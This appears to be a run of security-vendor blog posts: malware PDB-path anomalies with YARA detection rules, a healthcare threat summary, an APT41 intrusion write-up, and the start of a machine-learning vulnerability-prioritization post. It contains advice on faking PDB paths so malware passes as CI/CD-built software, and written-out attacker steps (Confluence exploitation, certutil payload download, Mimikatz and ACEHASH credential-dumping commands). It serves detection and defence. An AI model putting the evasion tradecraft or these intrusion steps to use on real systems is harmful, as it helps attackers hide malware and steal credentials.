The internet is a weird place, and at a big enough scale, you end up seeing things that you never thought you would. Things that deviate from the norms, things that shirk the standards, things that utterly defy explanation. We expect PDB paths to look a certain way, but we’ve run across several samples that did not, and we’re not always sure why. Many of the samples below may be results of errors, corruption, obfuscation, or various forms of intentional manipulation. We’re demonstrating them here to show that if you are attempting PDB path parsing or detection, you need to understand the variety of paths in the wild and prepare for shenanigans galore. Each of these examples is from a confirmed malware sample.

Shenanigan

Example PDB Paths

Unicode error

Text Path: C^\Users\DELL\Desktop\interne.2.pdb

Raw Path: 435E5C55 73657273 5C44454C 4C5C4465 736B746F 705C696E 7465726E 6598322E 706462

 

Text Path: Cj\Users\hacker messan\Deskto \Server111.pdb

Raw Path: 436A5C55 73657273 5C686163 6B657220 6D657373 616E5C44 65736B74 6FA05C53 65727665 72313131 2E706462

Nothing but space

Text Path:                                                         

Full Raw: 52534453 7A7F54BF BAC9DE45 89DC995F F09D2327 0A000000 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202000

Spaced out

Text Path: D:\                                 .pdb

Full Raw: 52534453 A7FBBBFE 5C41A545 896EF92F 71CD1F08 01000000 443A5C20 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 2E706462 00

Nothin’ but null

Text Path: <null bytes only>

Full Raw: 52534453 97272434 3BACFA42 B2DAEE99 FAB00902 01000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000

Random characters

Text Path: Lmd9knkjasdLmd9knkjasLmd9knkAaGc.pdb

Random path

Text Path: G:\givgLxNzKzUt\TcyaxiavDCiu\bGGiYrco\QNfWgtSs\auaXaWyjgmPqd.pdb

Word soup

Text Path: c:\Busy\molecule\Blue\Valley\Steel\King\enemy\Himyard.pdb

Mixed doubles

Text Path: C::\\QQQQQQQQ\VVVVVVVVVVVVVVVVV.pdb

Short

Text Path: 1.pdb

No .pdb

Text Path: a

Full Raw: 52534453 ED86CA3D 6C677946 822E668F F48B0F9D 01000000 6100

Long and weird with repeated character

Text Path: ªªªªªªªªªªªªªªªªªªªªtinjs\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaae.pdb

Full Raw: 52534453 DD947C2F 6B32544C 8C3ACB2E C7C39F45 01000000 AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA 74696E6A 735C6161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 652E7064 6200

No idea

Text Path: n:.Lí..×ÖòÒ.

Full Raw: 52534453 5A2D831D CB4DCF1E 4A05F51B 94992AA0 B7CFEE32 6E3AAD4C ED1A1DD7 D6F2D29E 00

Forward slashes and no drive letter

Text Path: /Users/user/Documents/GitHub/SharpWMI/SharpWMI/obj/Debug/SharpWMI.pdb

Network share

Text path:

\\vmware-host\shared folders\Decrypter\Decrypter\obj\Release\Decrypter.pdb

Non-Latin drive letter

We haven’t seen this yet, but it’s only a matter of time until you can have an emoji as a drive letter.

Figure 15: A selection of PDB paths shenanigans with examples
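
Given the variety above, any extraction logic should be more forgiving than the drive-letter-anchored pattern used earlier. A permissive Python sketch that simply takes whatever sits between the 24-byte CodeView header and the terminating null, shenanigans and all, might look like this:

import re

# Accepts network shares, forward slashes, missing ".pdb" extensions,
# and short or empty paths: anything up to the first null terminator.
CODEVIEW_ANY = re.compile(rb"RSDS.{20}([^\x00]{0,1000})\x00", re.DOTALL)

def extract_pdb_candidates(data: bytes):
    return [m.group(1).decode("latin-1", "replace") for m in CODEVIEW_ANY.finditer(data)]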

Betwixt Nerf Herders and Elite Operators

There are many differences between apex threat actors and the rest, even if all successfully perform intrusion operations. Groups that exercise good OPSEC in some campaigns may have bad OPSEC in others. APT36 has hundreds of leaked PDB paths, whereas APT30 has a minimal PDB path footprint, while APT38 is a ghost.

When PDB paths are present, the types of keywords, terms, and other string items present in PDB paths are all on a spectrum of professionalism and sophistication. On one end we’re seeing “njRAT-FUD 0.3” and “1337 h4ckbot” and on the other end we’re seeing “minidionis” and “msrstd”.

The trendy critique of string-based detection goes something like “advanced adversaries would never act so carelessly; they’ll obfuscate and evade your naïve and brittle signatures.” In the tables above for PDB path keywords, terms and anomalies, we think we’ve shown that bona fide APT/FIN groups, state-sponsored adversaries, and the best-of-the-best attackers do sometimes slip up and give us an opportunity for detection.

Let’s call out some specific examples from boutique malware from some of the more advanced threat groups.

Equation Group

Some Equation Group samples show full PDB paths that indicate that some of the malware was compiled in debug mode on workstations or virtual machines used for development.

Other Equation Group samples have partially qualified PDB paths that represent something less obvious. These standalone PDB names may reflect a more tailored, multi-developer environment, where it wouldn’t make sense to specify a fully qualified PDB path for a single developer system. Instead, the linker is instructed to write only the PDB file name in the built executable. Still, these PDB paths are unique to their malware samples:

  • tdip.pdb
  • volrec.pdb
  • msrstd.pdb

Regin

Deeming a piece of malware a “backdoor” is increasingly passé. Calling a piece of malware an “implant” is the new hotness, and the general public may be adopting this nouveau nomenclature long after purported Western governments. In this component of the Regin platform, we see a developer that was way ahead of the curve:

APT29

Let’s not forget APT29, whose brazen worldwide intrusion sprees often involve pieces of creative, elaborate, and stealthy malware. APT29 is amongst the better groups at staying quiet, but in thousands of pieces of malware, these normally disciplined operators did leak a few PDB paths such as:

  • c:\Users\developer\Desktop\unmodified_netimplant\minidionis\minidionis\obj\Debug\minidionis.pdb
  • C:\Projects\nemesis-gemina\nemesis\bin\carriers\ezlzma_x86_exe.pdb

Even when the premier outfits don’t use the glaring keywords, there may still be some string terms, anomalies and unique values present in PDB paths that each represent an opportunity for detection.

ConventionEngine

We extract and index all PDB paths from all executables so we can easily search and spelunk through our data. But not everyone has it that easy, so we cranked out a quick collection of nearly 100 Yara rules for PDB path keywords, terms and anomalies that we believe researchers and analysts can use to detect evil. We named this collection of rules “ConventionEngine” after the industry joke that security vendors love to talk about their elite detection “engines,” when behind the green curtain they’re all just a spaghetti mess of scripts and signatures – which this absolutely started as.

Instead of tight production “signatures,” you can think of these as “weak signals” or “discovery rules” that are meant to build haystacks of varying size and fidelity for analysts to hunt through. Those rules with a low signal-to-noise ratio (SNR) could be fed to automated systems for logging or contextualization of file objects, whereas rules with a higher SNR could be fed directly to analysts for review or investigation.

Our adversaries are human. They err. And when they do, we can catch them. We are pleased to release ConventionEngine rules for anyone to use in that effort. Together these rules cover samples from over 300 named malware families, hundreds of unnamed malware families, 39 different APT and FIN threat groups, and over 200 UNC (uncategorized) groups of activity.

We hope you can use these rules as templates, or as starting points for further PDB path detection ideas. There’s plenty of room for additional keywords, terms, and anomalies. Be advised, whether for detection or hunting or merely for context, you will need to tune and add additional logic to each of these rules to make the size of the resulting haystacks appropriate for your purposes, your operations and the technology within your organization. When judiciously implemented, we believe these rules can enrich analysis and detect things that are missed elsewhere.

PDB Paths for Intelligence Teams

Gettin' Lucky with APT31

During an incident response investigation, we found an APT31 account on GitHub being used for staging malware files and for malware communications. The intrusion operators using this account weren’t shy about putting full code packages right into the repositories, and we were able to recover actual PDB files associated with multiple malware ecosystems. Using the actual PDB files, we were able to see the full directory paths of the raw malware source code, representing a considerable intelligence gain about the malware’s original development environment. We used what we found in the PDB itself to search for other files related to this malware author.

Finding Malware Source Code Using PDBs

Malware PDBs themselves are easier to find than one may think. Sure, sometimes the authors are kind enough to leave everything up on Github. But there are some other occasions too: sometimes malware source code will get inadvertently flagged by antivirus or endpoint detection and response (EDR) agents; sometimes malware source code will be left in open directories; and sometimes malware source code will get uploaded to the big malware repositories.

You can find malware source code by looking for things like Visual Studio solution files, or simply with Yara rules looking for PDB files in archives that have some non-zero detection rate or other metadata that raises the likelihood that some component in the archive is indeed malicious.

rule PDB_Header_V2
{
    meta:
        author = "@stvemillertime"
        description = "This looks for PDB files based on headers."
    strings:
        //$string = "Microsoft C/C++ program database 2.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 70726F67 72616D20 64617461 62617365 20322E30 300D0A}
    condition:
        $hex at 0
}

rule PDB_Header_V7
{
    meta:
        author = "@stvemillertime"
        description = "This looks for PDB files based on headers."
    strings:
        //$string = "Microsoft C/C++ MSF 7.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 4D534620 372E3030}
    condition:
        $hex at 0
}

PDB Paths for Offensive Teams

FireEye has confirmed individual attribution to bona fide threat actors and red teamers based in part on leaked PDB paths in malware samples. The broader analyst community often uses PDB paths for clustering and pivoting to related malware families and while building a case for attribution, tracking, or pursuit of malware developers. Naturally, red team and offensive operators should be aware of the artifacts that are left behind during the compilation process and abstain from compiling with symbol generation enabled – basically, remember to practice good OPSEC on your implants. That said, there is an opportunity for creating artificial PDB paths should one wish to intentionally introduce this artifact.

Making PDB Paths Appear More “Legitimate”

One notable differentiator between malware and non-malware is that malware is typically not developed in an “enterprise” or “commercial” software development setting. The difference here is that in large development settings, software engineers are working on big projects together through productivity tools, and the software is constantly updated and rebuilt through automated “continuous integration” (CI) or “continuous delivery” (CD) suites such as Jenkins and TeamCity.  This means that when PDB paths are present in legitimate enterprise software packages, they often have toolmarks showing their compile path on a CI/CD build server.

Here are some examples of PDB paths of legitimate software executables built in a CI/CD environment:

  • D:\Jenkins\workspace\QA_Build_5_19_ServerEx_win32\_buildoutput\ServerEx\Win32\Release\_symbols\keysvc.pdb
  • D:\bamboo-agent-home\xml-data\build-dir\MC-MCSQ1-JOB1\src\MobilePrint\obj\x86\Release\MobilePrint.pdb
  • C:\TeamCity\BuildAgent\work\714c88d7aeacd752\Build\Release\cs.pdb
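
One simple way to act on this observation, sketched below, is to treat build-server tokens as a feature when triaging PDB paths. The token list is illustrative and drawn from the example paths above; it is a heuristic, not a verdict.

# Illustrative heuristic: does a PDB path look like it came from a CI/CD build server?
CI_TOKENS = ("jenkins", "bamboo", "teamcity", "buildagent", "build-dir", "workspace")

def looks_like_ci_build(pdb_path: str) -> bool:
    lowered = pdb_path.lower()
    return any(token in lowered for token in CI_TOKENS)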

We do not discount the fact that some malware developers are using CI/CD build environments. We know that some threat actors and malware authors are indeed adopting contemporary enterprise development processes, but malware PDBs like this example are extraordinarily rare:

  • c:\users\builder\bamboo~1\xml-data\build-~1\trm-pa~1\agent\window~1\rootkit\Output\i386\KScan.pdb

Specifying Custom PDB Paths in Visual Studio

Specifying a custom path for a PDB file is not uncommon in the development world. An offensive or red team operator may wish to specify a fake PDB path and can do so easily using compiler linking options.

As our example malware author “smiller” learns and hones their tradecraft, they may adopt a stealthier approach and choose to include one of those more “legitimate” looking PDB paths in new malware compilations.

Take smiller’s example malware project located at the path:

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\


Figure 16: hellol.cpp code shown in Visual Studio with debug build information

Compiled in the default Debug configuration, this project places both the hellol.exe file and the hellol.pdb file under

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\Debug\


Figure 17: hellol.exe and hellol.pdb, compiled by debug configuration default into its resident folder

It’s easy to change the properties of this project and manually specify the generation path of the PDB file. From the Visual Studio taskbar, select Project > Properties, then in the side pane select Linker > Debugging and fill the option box for “Generate Program Database File.” This option accepts Visual Studio macros so there is plenty of flexibility for scripting and creating custom build configurations for falsifying or randomizing PDB paths.


Figure 18: hellol project Properties showing defaults for the PDB path


Figure 19: hellol project Properties now showing a manually specified path for the (fake) PDB path

When we examine the raw hellol.exe, we can see at the byte level that the linker has included debug information in the executable specifying our designated PDB path, which of course is not real. Alternatively, if building at the command line, you could specify /PDBALTPATH, which can create a PDB file name that does not rely on the file structure of the build computer.


Figure 20: Rebuilt hellol.exe as seen through the PEview utility, which shows us the fake PDB path in the IMAGE_DEBUG_TYPE_CODEVIEW directory of the executable

An offensive or red team operator could intentionally include a PDB path in a piece of malware, making the executable appear to be compiled on a CI/CD server which could help the malware fly under the radar. Additionally, an operator could include a PDB path or strings associated with a known malware family or threat group to confound analysts. Why not throw in a small homage to one of your favorite malware operators or authors, such as the infamous APT33 persona xman_1365_x? Or perhaps throw in a “\Homework\CS1101\” to make the activity seem more academic? For whatever reason, if there is PDB manipulation to be done, it is generally doable with common software development tools.

The Glory and the Nothing of a (Malware) Name

In the context of PDB paths and malware author naming conventions, it is important to acknowledge the interdependent (and often circular) nature of “offense” and “defense.” Which came first, a defender calling a piece of malware a “trojan” or a malware author naming their code project a “trojan”? Some malware is inspired by prior work. An author names a code project “MIMIKATZ”, and years later there are hundreds of related projects and scripts with derivative names.

Although definitions may vary, we see that both the offensive and defensive sides characterize the functionality or role of a piece of malware using much of the same vernacular and inspiration. We suspect this began with “virus” and that the array of granular, descriptive terms will continue to grow as public discourse advances the malware taxonomy. Who would have suspected that how we talked about malware would ultimately lead to the possibility of detecting it? After all, would a rootkit by any other name be as evil? Somewhere, a scholar is beaming with wonder at the intersection of malware and linguistics.

Conclusions

If by now you’re thinking this is all kind of silly, don’t worry, you’re in good company. PDB paths are indeed a wonky attribute of a file. The mere presence of these paths in an executable is by no means evil, yet when these paths are present in pieces of malware, they usually represent acts of operational indiscretion. The idea of detecting malware based on PDB paths is kind of like detecting a robber based on what type of hat a person is wearing, if they’re wearing one at all.

We have been historically successful in using PDB paths mostly as an analytical pivot, to help us cluster malware families and track malware developers. When we began to study PDB paths holistically, we noticed that many malware authors were using many of the same naming conventions for their folders and project files. They were naming their malware projects after the functionality of the malware itself, and they routinely labeled their projects with unique, descriptive language.

We found that many malware authors and operators leaked PDB paths that described the functionality of the malware itself and gave us insight into the development environment. Furthermore, outside of the descriptors of the malware development files and environment, when PDB paths are present, we identified anomalies that help us surface files that are more likely to be circumstantially interesting. There is room for red team and offensive operators to improve their tradecraft by falsifying PDB paths for purposes of stealth or razzle-dazzle.

We remain optimistic that we can squeeze some juice from PDB paths when they are present. A survey of about 2200 named malware families (including all samples from 41 APT and 10 FIN groups and a couple million other uncategorized executables) shows that PDB paths are present in malware about five percent of the time. Imagine if you could have a detection “backup plan” for five plus percent of malware, using a feature that is itself inherently non-malicious. That’s kind of cool, right?

Future Work on Scaling PDB Path Classification

Our ConventionEngine rule pack for PDB path keyword, term and anomaly detection has been fun and found tons of malware that would have otherwise been missed. But there are a lot of PDB paths in malware that do not have such obvious keywords, and so our manual, cherry-picking, and extraordinarily laborious approach doesn’t scale.

Stay tuned for the next part of our blog series! In Part Deux, we explore scalable solutions for PDB path feature generalization and approaches for classification. We believe that data science approaches will better enable us to surface PDB paths with unique and interesting values and move towards a classification solution without any rules whatsoever.

Recommended Reading and Resources

Inspiring Research
Debugging and Symbols
Debug Directory and CodeView
Debugging and Visual Studio
PDB File Structure
PDB File Tools
ConventionEngine Rules

Healthcare: Research Data and PII Continuously Targeted by Multiple Threat Actors

The healthcare industry faces a range of threat groups and malicious activity. Given the critical role that healthcare plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential. It may also be one of the major reasons why we find healthcare to be one of the most retargeted industries.

In our new report, Beyond Compliance: Cyber Threats and Healthcare, we share an update on the types of threats observed affecting healthcare organizations: from criminal targeting of patient data to less frequent – but still high impact – cyber espionage intrusions, as well as disruptive and destructive threats. We urge you to review the full report for these insights, however, these are two key areas to keep in mind.

  • Chinese espionage targeting of medical researchers: We’ve seen medical research – specifically cancer research – continue to be a focus of multiple Chinese espionage groups. While it is difficult to fully assess the extent, years of cyber-enabled theft of research trial data might be starting to have an impact, as Chinese companies are reportedly now manufacturing cancer drugs at a lower cost than Western firms.
  • Healthcare databases for sale under $2,000: The sheer number of healthcare-associated databases for sale in the underground is outrageous. Even more concerning, many of these databases can be purchased for under $2,000 (based on sales we observed over a six-month period).

To learn more about the types of financially motivated cyber threat activity impacting healthcare organizations, nation state threats the healthcare sector should be aware of, and how the threat landscape is expected to evolve in the future, check out the full report here, or give a listen to this podcast conversation between Principal Analyst Luke McNamara and Grady Summers, EVP, Products:

For a closer look at the latest breach and threat landscape trends facing the healthcare sector, register for our Sept. 17, 2019, webinar.

For more details around an actor who has targeted healthcare, read about our newly revealed APT group, APT41.

GAME OVER: Detecting and Stopping an APT41 Operation

In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponizing and exploiting them within a matter of days.

Our knowledge of this group’s targets and activities is rooted in our Incident Response and Managed Defense services, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse engineer malware, collect intelligence, and hone our detection capabilities. This ultimately feeds back into our Managed Defense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.

In this blog post, we’re going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41. Our goal is to display not only how dynamic this group can be, but also how the various teams within FireEye worked to thwart attacks within hours of detection – protecting our clients’ networks, limiting the threat actor’s ability to gain a foothold, and preventing data exposure.

GET TO DA CHOPPA!

In April 2019, FireEye’s Managed Defense team identified suspicious activity on a publicly-accessible web server at a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the attackers were exploiting CVE-2019-3396, a vulnerability in Atlassian Confluence Server that allowed for path traversal and remote code execution.


Figure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability

This vulnerability relies on the following actions by the attacker:

  • Customizing the _template field to utilize a template that allowed for command execution.
  • Inserting a cmd field that provided the command to be executed.

Through custom JSON POST requests, the attackers were able to run commands and force the vulnerable system to download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.


Figure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396

As shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue arbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.


Figure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system

The HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system reconnaissance and utilized Windows certutil.exe to download a file located at hxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The file test.jsp was ultimately identified to be a variant of a China Chopper webshell.

A Passive Aggressive Operation

Shortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the system:

  • 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)
  • Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)

Both files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was used to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as HIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON malware family can be found in our full APT41 report).

Within the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to issue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web shell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:

  • Movement of 64.dat and Ins64.exe to C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Users

Additionally, FireEye’s FLARE team reverse engineered the custom protocol utilized by the HIGHNOON backdoor, allowing us to decode the attacker’s traffic. Figure 4 provides a list of the various commands issued by the attacker utilizing HIGHNOON.


Figure 4: Decoded HIGHNOON commands issued by the attacker

Playing Their ACEHASH Card

As shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that downloaded a script from PowerSploit, a well-known PowerShell post-exploitation framework. At the time of this blog post, the script was no longer available for download. The commands provided to the script – “privilege::debug sekurlsa::logonpasswords exit exit” – indicate that the unrecovered script was likely a copy of Invoke-Mimikatz, which reflectively loads Mimikatz 2.0 in memory. Per the observed HIGHNOON output, this command failed.

After performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional files into the C:\Program Files\Atlassian\Confluence directory:

  • c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)
  • F64.data (MD5: a919b4454679ef60b39c82bd686ed141)

These two files are the dropper and encrypted/compressed payload components, respectively, of a malware family known as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).

Upon placing c64.exe and F64.data on the system, the attacker ran the command

c64.exe f64.data "9839D7F1A0" -m

This specific command provided a password of “9839D7F1A0” to decrypt the contents of F64.data, and a switch of “-m”, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password provided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.

Ultimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware onto the vulnerable Confluence system. While the Mimikatz attempt failed, the attacker was able to harvest a single credential from the system via ACEHASH. However, because Managed Defense detected this activity rapidly via network signatures, the operation was neutralized before the attackers progressed any further.

Key Takeaways From This Incident

  • APT41 utilized multiple malware families to maintain access into this environment; impactful remediation requires full scoping of an incident.
  • For effective Managed Detection & Response services, having coverage of both Endpoint and Network is critical for detecting and responding to targeted attacks.
  • Attackers may weaponize vulnerabilities quickly after their release, especially if they are present within a targeted environment. Patching critical vulnerabilities as soon as possible is crucial to deterring active attackers.

Detecting the Techniques

FireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China Chopper.

Detection / Signature Name:

  • China Chopper: FE_Webshell_JSP_CHOPPER_1, FE_Webshell_Java_CHOPPER_1, FE_Webshell_MSIL_CHOPPER_1
  • HIGHNOON.PASSIVE: FE_APT_Backdoor_Raw64_HIGHNOON_2, FE_APT_Backdoor_Win64_HIGHNOON_2
  • Certutil Downloader: CERTUTIL.EXE DOWNLOADER (UTILITY), CERTUTIL.EXE DOWNLOADER A (UTILITY)
  • ACEHASH: FE_Trojan_AceHash

Indicators

Type / Indicator / MD5 Hash (if applicable):

  • File: test.jsp, MD5 84d6e4ba1f4268e50810dacc7bbc3935
  • File: 64.dat, MD5 51e06382a88eb09639e1bc3565b444a6
  • File: Ins64.exe, MD5 e42555b218248d1a2ba92c1532ef6786
  • File: c64.exe, MD5 846cdb921841ac671c86350d494abf9c
  • File: F64.data, MD5 a919b4454679ef60b39c82bd686ed141
  • IP Address: 67.229.97[.]229, N/A

Looking for more? Join us for a webcast on August 29, 2019 where we detail more of APT41’s activities. You can also find a direct link to the public APT41 report here.

Acknowledgements

Special thanks to Dan Perez, Andrew Thompson, Tyler Dean, Raymond Leong, and Willi Ballenthin for identification and reversing of the HIGHNOON.PASSIVE malware.

Showing Vulnerability to a Machine: Automated Prioritization of Software Vulnerabilities

Introduction

If a software vulnerability can be detected and remedied, then a potential intrusion is prevented. While not all software vulnerabilities are known, 86 percent of vulnerabilities leading to a data breach were patchable, though there is some risk of inadvertent damage when applying software patches. When new vulnerabilities are identified they are published in the Common Vulnerabilities and Exposures (CVE) dictionary by vulnerability databases, such as the National Vulnerability Database (NVD).

The Common Vulnerability Scoring System (CVSS) provides a metric for prioritization that is meant to capture the potential severity of a vulnerability. However, it has been criticized for lacking timeliness, representation of the vulnerable population, normalization, rescoring, and broader expert consensus, which can lead to disagreements. For example, some of the worst exploits have been assigned low CVSS scores. Additionally, CVSS does not measure the vulnerable population size, which many practitioners have stated they expect it to capture. The design of the current CVSS system also rates too many vulnerabilities as severe, which causes user fatigue.

To provide a more timely and broad approach, we use machine learning to analyze users’ opinions about the severity of vulnerabilities by examining relevant tweets. The model predicts whether users believe a vulnerability is likely to affect a large number of people, or if the vulnerability is less dangerous and unlikely to be exploited. The predictions from our model are then used to score vulnerabilities faster than traditional approaches, like CVSS, while providing a different method for measuring severity, which better reflects real-world impact.

Our work uses nowcasting to address this important gap: prioritizing early-stage CVEs and determining whether they are urgent. Nowcasting is the economic discipline of determining a trend or a trend reversal objectively in real time. In this case, we recognize the value of linking social media responses to a CVE after it is released but before it is scored by CVSS. Scores for CVEs should ideally be available as soon as possible after release, while the current process often hampers prioritization of triage and ultimately slows the response to severe vulnerabilities. This crowdsourced approach reflects numerous practitioner observations about the size and widespread nature of the vulnerable population, as shown in Figure 1. For example, in the Mirai botnet incident in 2016, a massive number of vulnerable IoT devices were compromised, leading to the largest Denial of Service (DoS) attack on the internet at the time.


Figure 1: Tweet showing social commentary on a vulnerability that reflects severity

Model Overview

Figure 2 illustrates the overall process, which starts with analyzing the content of a tweet and concludes with two forecasting evaluations. First, we run Named Entity Recognition (NER) on tweet contents to extract named entities. Second, we use two classifiers to assess the tweet’s relevancy and severity with respect to the identified entities. Finally, we match the relevant and severe tweets to the corresponding CVE.


Figure 2: Process overview of the steps in our CVE score forecasting

Each tweet is associated with CVEs by inspecting URLs or the contents hosted at a URL. Specifically, we link a CVE to a tweet if the tweet contains a CVE number in the message body, or if the URL content contains a CVE. Each tweet must be associated with a single CVE and must be classified as relevant to security-related topics to be scored. The first forecasting task considers how well our model can predict CVSS rankings ahead of time. The second task is predicting future exploitation of a CVE based on Symantec Antivirus Signatures and Exploit DB. The rationale is that eventual presence in these lists indicates not just that exploits can exist or do exist, but that they are publicly available.
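
The CVE-linking step can be illustrated with a small sketch; the regular expression below is a reasonable assumption about CVE identifier formats rather than the project’s exact implementation.

```python
import re

# Minimal sketch of the CVE-linking step: extract CVE identifiers from a
# tweet body (the full pipeline also inspects the content behind any URLs).
CVE_PATTERN = re.compile(r"CVE-\d{4}-\d{4,7}", re.IGNORECASE)

def linked_cves(tweet_text: str) -> set:
    return {m.upper() for m in CVE_PATTERN.findall(tweet_text)}

print(linked_cves("Heads up: cve-2019-3396 is being exploited in the wild"))
# {'CVE-2019-3396'}
```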

Modeling Approach

Predicting CVSS scores and exploitability from Twitter data involves multiple steps. First, we need to find appropriate representations (or features) of the natural language so it can be processed by machine learning models. In this work, we use two natural language processing methods for extracting features from text: (1) n-gram features, and (2) word embeddings. Second, we use these features to predict whether the tweet is relevant to the cyber security field using a classification model. Third, we use these features to predict whether the relevant tweets are making strong statements indicative of severity. Finally, we match the severe and relevant tweets up to the corresponding CVE.

N-grams are word sequences, such as word pairs for 2-grams or word triples for 3-grams. In other words, they are contiguous sequences of n words from a text. After we extract these n-grams, we can represent the original text as a bag-of-ngrams. Consider the sentence:

A critical vulnerability was found in Linux.

If we consider all 2-gram features, then the bag-of-ngrams representation contains “A critical”, “critical vulnerability”, etc.
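
A minimal sketch of the bag-of-ngrams idea, using scikit-learn purely for illustration (the study’s actual feature extraction code is not shown here, and the parameters below are our own choices):

```python
from sklearn.feature_extraction.text import CountVectorizer

# Toy sketch of a bag-of-ngrams representation; the vectorizer settings are
# illustrative, not necessarily the study's exact setup.
docs = ["A critical vulnerability was found in Linux."]
vectorizer = CountVectorizer(ngram_range=(2, 2),            # 2-grams only
                             lowercase=False,
                             token_pattern=r"(?u)\b\w+\b")  # keep 1-char tokens like "A"
bag = vectorizer.fit_transform(docs)
print(sorted(vectorizer.vocabulary_))
# ['A critical', 'critical vulnerability', 'found in', 'in Linux', ...]
```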

Word embeddings are a way to learn the meaning of a word from how it was used in previous contexts, and then represent that meaning in a vector space. Word embeddings capture the meaning of a word by the company it keeps, more formally known as the distributional hypothesis. These word embedding representations are machine friendly, and similar words are often assigned similar representations. Word embeddings are domain specific. In our work, we additionally train embeddings on terminology specific to cyber security topics; for example, words related to threats include defenses, cyberrisk, cybersecurity, threat, and iot-based. The embeddings allow a classifier to implicitly combine the knowledge of similar words and the meaning of how concepts differ. Conceptually, word embeddings may help a classifier implicitly associate relationships such as:

device + infected = zombie

where an entity called device has a mechanism applied called infected (malicious software infecting it) then it becomes a zombie.
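
The toy sketch below shows the kind of vector arithmetic this intuition refers to; the vectors are made up for illustration and are not trained embeddings.

```python
import numpy as np

# Purely illustrative toy vectors (not trained embeddings) showing the
# "device + infected = zombie" style of vector arithmetic.
emb = {
    "device":   np.array([0.9, 0.1, 0.0]),
    "infected": np.array([0.0, 0.8, 0.3]),
    "zombie":   np.array([0.8, 0.9, 0.3]),
    "printer":  np.array([0.7, 0.0, 0.1]),
}

def cosine(a, b):
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

query = emb["device"] + emb["infected"]
best = max((w for w in emb if w not in ("device", "infected")),
           key=lambda w: cosine(query, emb[w]))
print(best)  # 'zombie' for these toy vectors
```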

To address the ways social media tweets differ linguistically from natural language, we leverage previous research and software from the Natural Language Processing (NLP) community. This addresses nuances specific to tweets, such as less consistent capitalization, and applies stemming and handling for special characters like ‘@’ and ‘#’.


Figure 3: Tweet demonstrating value of identifying named entities in tweets in order to gauge severity

Named Entity Recognition (NER) identifies the words that construct nouns based on their context within a sentence, and benefits from our embeddings incorporating cyber security words. Correctly identifying the nouns using NER is important to how we parse a sentence. In Figure 3, for instance, NER allows Windows 10 to be understood as an entity while October 2018 is treated as elements of a date. Without this ability, the text in Figure 3 might be confused with the physical notion of windows in a building.

Once NER tokens are identified, they are used to test if a vulnerability affects them. In the Windows 10 example, Windows 10 is the entity and the classifier will predict whether the user believes there is a serious vulnerability affecting Windows 10. One prediction is made per entity, even if a tweet contains multiple entities. Filtering tweets that do not contain named entities reduces tweets to only those relevant to expressing observations on a software vulnerability.

From these normalized tweets, we can gain insight into how strongly users are emphasizing the importance of the vulnerability by observing their choice of words. The choice of adjective is instrumental in the classifier capturing the strong opinions. Twitter users often use strong adjectives and superlatives to convey magnitude in a tweet or when stressing the importance of something related to a vulnerability like in Figure 4. This magnitude often indicates to the model when a vulnerability’s exploitation is widespread. Table 1 shows our analysis of important adjectives that tend to indicate a more severe vulnerability.
